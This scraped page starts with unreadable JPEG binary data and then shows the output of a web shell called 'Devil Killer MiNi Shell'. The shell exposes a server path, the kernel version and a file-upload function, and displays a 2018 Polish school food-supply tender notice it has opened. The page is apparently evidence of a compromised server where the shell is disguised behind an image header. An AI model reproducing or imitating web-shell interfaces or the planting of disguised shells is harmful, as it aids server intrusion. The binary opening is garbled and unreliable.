JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20181122/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20181122/651728-N-2018.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 651728-N-2018 z dnia 2018-11-22 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Gmina Pniewy Zespół Szkół im. Emilii Sczanieckiej</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">SUKCESYWNY ZAKUP I DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH DLA ZESPOŁU SZKÓŁ IM. E. SCZANIECKIEJ W PNIEWACH -2019ROK</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Gmina Pniewy Zespół Szkół im. Emilii Sczanieckiej</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">000777214</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Wolności</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">10</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">62-045</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Pniewy</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">wielkopolskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">612910607, 612911844</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">zespolszkolpniewy@wp.pl, bursa_szkolna_pniewy@interia.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax"></span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url"></span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Inny (proszę określić):</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny">Zespół Szkół im. E. Sczanieckiej</span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.zespolszkolpniewy.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Nie</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny"></span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres"></span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">SUKCESYWNY ZAKUP I DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH DLA ZESPOŁU SZKÓŁ IM. E. SCZANIECKIEJ W PNIEWACH -2019ROK</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny"></span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy">6</span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">WARZYWA ŚWIEŻE, OWOCE Banany kg 1300 Arbuz (odVI-IX) kg 150 Brukselka świeża (IX) kg 40 Brzoskwinie (od V-IX) kg 300 Buraki kg 800 Brokuły szt 160 bazylia doniczka szt 30 Borówki op 0,5 kg (VII, VIII) szt 5 Cebula kg 850 Cukinia kg 45 Cytryna kg 160 Czosnek siatka szt 50 Fasolka szparagowa żółta (IX) kg 35 Jabłka kg 1500 Gruszka kg 440 Kalafior świeży szt 250 Kalarepa szt 140 Kapusta biała (od I-IV i IX-XII) kg 1200 Kapusta włoska szt 150 Kapusta czerwona kg 475 Kiwi pakowane pojedyńczo szt 1750 koperek świeży PĘCZKI 1900 Kapusta pekińska -główka główka 120 Lubczyk doniczka szt 30 Marchew korzeń kg 1140 Mandarynki kg 75 Mięta doniczka szt 30 nektarynka (od V-IX) kg 130 Oregano doniczka szt 15 Ogórki zielone świeże (VII, VIII, IX) kg 140 Papryka czerwona świeża( I-VI, X-XII) kg 100 Papryka żółta świeża kg 15Rukola liście op 100g szt 10 Pieczarki świeże kg 220 Pietruszka korzeń kg 650 Pomidory (od I-VI i od X do XII) kg 240 pomarańcza kg 130 Por kg 500 Rabarbar - m-c lipiec, sierpień kg 5 Rzodkiewka pęczek 140 Rozmaryn doniczka szt 25 Sałata zielona główka 130 sałata lodowa główka 30 Seler korzeń kg 930 Seler naciowy 0,5 kg szt 10 Szczypiorek świeży pęczek 325 Tymianek doniczka szt 10 Truskawki - m-c czerwiec, lipiec kg 5 Winogrono kg 7 Zielona pietruszka świeża pęczek pęczek 1600 Ziemniaki jadalne kg 15000 PRZETWORY KONSERWOWE, MĄCZNE, PRZYPRAWY, TŁUSZCZE, JAJA Ananas puszka 580g szt 50 Bazylia 10 g szt 40 Budyń bez cukru cykoria(śmietankowy, malinowy, czekoladowy) szt 20 Brzoskwinie puszka 822 g szt 110 Curry 30 g szt 12 Cukier kryształ w oryginalnym opakowaniu op. 1 kg kg 130 Cukier puder 0,4 kg szt 4 Cukier waniliowy 32g szt 45 Cynamon 20 g szt 20 Czosnek mielony 20g szt 35 Chrzan tarty 160 g victus szt 80 Drożdże 100g szt 40 Dżem 220g(słodzony 100% sokiem typu łowicz) szt 420 Estragon 10g szt 5 Fasola ,,Jaś" luz kg 80 Fasola drobna luz na kg kg 110 Fasola czerwona puszka 400 g szt 60 Fasola szparagowa konserwowa 0,7 szt 120 Groszek konserwowy 400g szt 30 groch połówki luz kg 70 Gałka muszkatołowa 15 g szt 15 Galaretka 75 g (truskawkowa, wisniowa, pomarańczowa) szt 70 Herbata granulowana czarna 100g szt 200 herbata owocowa saga 25 torebek (malina, żurawina, pigwa i truskawka) szt 30 herbata mietowa 40 g, 100 % liści mięty pieprzowej szt 4 Imbir 20g szt 10 Jaja L szt 15000 Kakao extra ciemne 100 g szt 70 Kapusta czerwona 0,9 l szt 50 Kapusta naturalnie kiszona bez octu wiaderko 5 kg Wiaderko 130 Kasza wiejska 1 kg szt 380 Kasza jaglana luz kg 60 Kasza gryczana niepalona luz kg 80 Kasza kukurydziana 350 g szt 1 Kaszka manna w oryginalnym opakowaniu 1kg kg 20 Ketchup pikantny 205g słoik (190 g pomidorów na 100g ketchupu) szt 30 Kawa zbozowa 147 g typu anatol szt 25 Ketchup pikantny wyciskany 480g (192g pomidorów na 100g ketchupu szt 190 Kisiel bez cukru 40g szt 150 Kminek 20 g szt 10 kolendra 10 g szt 2 Koncentrat pomidorowy 30% 920g typu Międzychód szt 400 Konserwa rybna - filet z makreli w pomidorach 170g szt 40 Kukurydza konserwowa 400g szt 140 Kurkuma 10 g szt 2 Liść laurowy 80g szt 10 Lubczyk 150 g szt 120 Majeranek 300 g szt 40 Majonez dekoracyjny 700ml typu winiary szt 200 Makaron nitka rosołowa, świderki opakowanie 400g - 100% semolina z pszenicy durum typu sulma szt 500 makaron pełnoziarnisty świderek 400 g szt 60 Makaron drobne muszelki, kolanko, rurki, nitka spagetti, opakowanie 500g-100% semolina z pszenicy durum typu sulma szt 555 Makaron lasagne 500g szt 12 Makaron kokardki 400g szt 15 Makaron wstążki długie, pióra 400 g - 100% semolina z pszenicy durum szt 45 Makaron rurki 500 g szt 20 Mąka wrocławska pszenna TYP 500 w oryginalnych opakowaniach 1kg kg 900 Mąka orkiszowa typ 720 w oryginalnych opakowaniach 1 kg kg 5 Mąka tortowa typ 450 w oryginalnych opakowaniach kg 24 Mąka ziemniaczana 1kg w oryginalnych opakowaniach kg 40 Mąka zytnia typ 720 w oryginalnych opakowaniach kg 3 Mąka ryżowa kg 1 Mąka kukurydziana kg 7 Miód naturalny 1 litr szt 250 Morela suszona 150g bez dodatku cukrów i substancji słodzących szt 2 Musztarda stołowa słoik 200g szt 100 Mus jabłkowy 720 g szt 90 Ocet jabłkowy500ml szt 20 Ocet balsamiczny 250 ml szt 3 Ogórki konserwowe 900g szt 230 Ogórki kwaszone wiaderko 3kg wiaderko 76 Ogórki małosolne 2 kg szt 20 Oregano 10g szt 40 Orzechy włoskie 100g szt 10 Olej butelka 5 l typu kujawska szt 170 Otręby owsiane 150g szt 2 Papryka konserwowa 900ml szt 50 Papryka mielona ostra 20g szt 250 Papryka mielona słodka 20g szt 250 Pasztet drobiowy typu profi szt 80 Proszek do pieczenia 16g szt 6 Pieprz mielony100g szt 110 Płatki kukurydziane250g typu corn flakes szt 100 Płatki bezglutenowe 250g szt 2 płatki owsiane górskie 500g szt 20 Powidła węgierkowe 310g szt 40 Przyprawa do kebabu 30 g szt 20 Przyprawa do szaszłyków 20g szt 15 pestki dyni 100g szt 10 Przyprawa do grila 20g szt 10 Ryż długoziarnisty biały oryginalne opakowanie 1kg szt 480 Ryż naturalny 400g szt 15 Rodzynki 100g szt 80 Rozmaryn 15 g szt 10 Sezam 1 kg kg 15 Siemie lniane 100g szt 1 Śliwki suszone 150 g bez dodatku cukrów i substancji słodzących szt 5 Słonecznik łuskany100g szt 20 sok 100% bez dodatku cukru( jabłkowy, pomarańczowy, multiwitamina, wieloowocowy 2 l) karton 2000 Sok 100 % w kartoniku ze słomką 0,2 szt 150 Sól spożywcza, jodowana op.1kg kg 400 sól sodowo-potasowa 350 g szt 30 Soda 60g szt 1 Tymianek 10 g szt 25 Tuńczyk w oleju 170g w kawałkach szt 40 woda n/g 5 l szt 154 woda n/g 1,5l szt 36 woda n/g mineralna 0,5 l szt 500 Zioła prowansalskie 10 g szt 5 Zaprawa żurek na naturalnym zakwasie 500ml (butelka szklana) szt 200 Ziele angielskie 15g szt 100 Żelatyna 50g szt 10MROŻONKI, RYBY MROŻONE, PRZETWORY RYBNE Brokuły mrożone op 2 kg op 110 Brukselka mrożona op 2,5 kg op 70 Fasolka szparagowa cieta op 2,5 op 100 Fasolka żółta cała 2,5kg op 38 Groszek mrożony op 2,5 op 50 Kalafior mrożony op2 kg op 180 Makrela wędzona kg 12 Marchew mrożona op 2,5 kg op 120 Marchew z groszkiem mrożona op 2,5 kg op 149 Marchewka mini 2,5 kg op 150 Mieszanka chińska 450g szt 150 Mieszanka europejska 2,5 kg3 składnikowa (kalafior, brokuł, marchewka) op 80 Matias - śledź solony wiaderko 2kg szt 70 Pyzy drożdżowe op 9 szt op 1300 Wiśnie mrożone op 2,5 kg op 35 Truskawki mrożone op 2,5 kg op 15 Czarna porzeczka 2,5 kg op 2 Malina 2,5 kg op 5 Mieszanka kompotowa op 2,5 kg szt 6 Ryba mrozona mintaj SHP kg 120 Ryba mrożona dorsz SHP kg 230 Ryba mrozona morszczuk SHP kg 200 Ryba mrożona miruna SHP kg 300 Szpinak mrozony op2,5 kg op 21 Włoszczyzna w paski op 2,5 kg op 200 Zupa wiosenna 8 składnikowa op 2,5 kg op 30 PIECZYWO, CIASTO Bułka mała 60 g szt 8000 Bułka hamburgerowa 120g szt 300 Bułka hot-dog 80g szt 284 Bułka tarta 1 kg kg 380 Chleb wieloziarnisty 500g krojony szt 360 Chleb zwykły 600g krojony szt 1150 Bagietka 30cm szt 30 Kawiorek 350gr krojony szt 200 Drożdżówki 100g, szt 1800 Babka poznańska kg 3 Pierniki kg 3 Rogale kg 6 Makowiec kg 3 Chleb razowy żytni 500g - krojony szt 330 MIĘSO I PRZETWORY Karkówka wieprzowa b/k surowa kg 300 Łopatka wieprzowa b/k zmielona kg 1100 Mięso gulaszowe krojone w kostkę kg 400 Schab b/k surowy kg 1050 szynka b/k kulka kg 140 Żeberka I klasa kg 110 Filet z kurczaka bez chrząstki świeży kg 1700 Kurczak cały świeży, patroszony, tusza kg 55 Filet z indyka kg 130 Skrzydła z indyka kg 100 Porcje rosołowe świeźe kg 1200 Udo z kurczaka świeźe, surowe bez kości krzyzowej kg 1100 Pałka z kurczaka kg 30 Udziec z kurczaka kg 5 Boczek parzony kg 150 Kieł. biała cieńka delikatesowa 86% miesa kg 3 Kieł. typu farmerska kg 6 Kieł. typu kanapkowa kg 2,6 Kieł. typu słoikowa kg 3 Kieł. typu śląska 90% miesa kg 60 Kieł. typu zielonogórska kg 2 Kieł. typu zwyczajna kg 170 Kiełbaski pieprzowe - cienkie kg 15 Kieł. typu żywiecka kg 22 Kieł. Typu Wiejska kg 2 Łopatka wieprzowa wędlina -73 % mięsa kg 4 Mielonka wieprz. kg 1 Mielonka zapiekana kg 1 Ogonówka parzona kg 25 Parówki cieńkie 85% mięsa kg 90 Polędwica typu sopocka kg 40 Polędwiczka wędzona kg 7 polędwica staropolska kg 8 Salami kg 5 Serdelki kg 30 szynka bamberka 73 % mięsa kg 10 Szynka gotowana kg 40 szynka bez wędzenia 74 % mięsa kg 30 szynka starowiejska kg 8 Szynka konserwowa kg 18 szynka pieczona 73 % mięsa kg 17 szynka polska kg 9 Szynka tyrolska kg 5 szynka wiejska kg 18 szynka wiejska wędzona 99% mięsa kg 12 szynka ze wsi 96,5 % mięsa kg 10 szynka drobiowa 85 % mięsa kg 40 Wędlina drobiowa kg 8 Szynkowa wieprzowa kg 20 Smalec kg 2 Wątrobianka kg 5 NABIAŁ Jogurt owocowy (zawartość cukru do 13,5g/100g) 150g szt 3000 jogurt naturalny 180 g szt 130 jogurt naturalny z ziarnami zbóz 175g szt 130 jogurt naturalny 370 g szt 130 jogurty bezlaktozowe szt 2 Kefir 400g naturalny 2 %tł. szt 59 Masło extra 200g zaw.tłuszcz.82% szt 2760 Mleko 2% pasteryzowane butelka 1 ltr l 630 mleko karton 2 % szt 990 Maślanka typu mrągowska 1 l, (maślanka, mleko, żywe kultury bakterii mlekowych) szt 100 Mleko sojowe 1 l kartonik szt 3 Ser smażony 200g szt 110 ser feta 270 g szt 35 Ser topiony bloczki 100g szt 70 Ser almette 150 g szt 320 Ser kanapkowy 150 g szt 150 ser mascarpone 250g szt 20 ser pleśniowy camembert 120 g szt 60 Serek homogenizowany poznański200g szt 10 Ser mozarella 125 g szt 40 Sery żółte różne zaw. tłuszcz. nie mniej niż 40%( salami, gouda) kg 180 Sery żółte różne zaw. tłuszcz. nie mniej niż 40%( królewski, rolada ustrzycka) kg 180 Śmietana słodka 12% 0,5 l- kartonik szt 840 Śmietana kremówka 30 % 250 ml-kartonik szt 110 Śmietana zakwaszana 18% 180g szt 300 Gzik Wielkopolski 200 g szt 50 Serek wiejski 150 g typu piątnica szt 170 Twaróg extra śmietankowy mielony kg 630 Twaróg wędzony zaw.tłuszcz.26% kg 11 </span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">15300000-1</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid 